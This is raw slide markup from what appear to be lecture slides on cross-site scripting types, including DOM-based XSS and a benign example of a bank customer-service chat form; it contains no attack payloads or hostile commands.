                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>back</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Based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C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>side</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:endParaRPr sz="3733">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>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4" name="object 4"/>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6" name="object 6"/>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8" name="object 8"/>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5283" y="6195905"/>
            <a:ext cx="830580" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8278785" y="2291956"/>
            <a:ext cx="2329180" cy="2324947"/>
            <a:chOff x="6209088" y="1718967"/>
            <a:chExt cx="1746885" cy="1743710"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1.	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>User asks </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>question</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>via</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-520" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>(message:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“How</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>do</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a loan?”)</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8331200" cy="492760"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6248400" cy="369570"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>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0" name="object 10"/>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11" name="object 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104986" y="30303"/>
            <a:ext cx="6361007" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="5533675" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-87" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612717" y="815171"/>
            <a:ext cx="6147647" cy="672706"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16087" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="127"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> form</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-460" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>chat</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>customer</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>associate.</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9667242"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9402758" y="1245718"/>
            <a:ext cx="2480733" cy="1144692"/>
            <a:chOff x="7052068" y="934288"/>
            <a:chExt cx="1860550" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7052068" y="940473"/>
              <a:ext cx="683679" cy="683677"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7712913" y="944714"/>
              <a:ext cx="1157358" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>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0" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7674864" y="1062228"/>
              <a:ext cx="1237475" cy="729992"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>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2" name="object 22"/>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23" name="object 23"/>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24" name="object 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10253472" y="1487408"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="7690103" y="1115555"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8430762" y="1115555"/>
              <a:ext cx="458723" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>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7" name="object 27"/>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28" name="object 28"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8638022" y="1246644"/>
              <a:ext cx="251456" cy="158483"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7690103" y="1344167"/>
              <a:ext cx="1207007" cy="109727"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>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31" name="object 31"/>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2" name="object 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10396371" y="1552587"/>
            <a:ext cx="1458807" cy="220133"/>
            <a:chOff x="7797278" y="1164440"/>
            <a:chExt cx="1094105" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="object 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="8432292" y="1178039"/>
              <a:ext cx="458718" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="object 34"/>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5" name="object 35"/>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6" name="object 36"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="7797278" y="1164440"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>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38" name="object 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10239237" y="1798319"/>
            <a:ext cx="497840" cy="591820"/>
            <a:chOff x="7679428" y="1348739"/>
            <a:chExt cx="373380" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
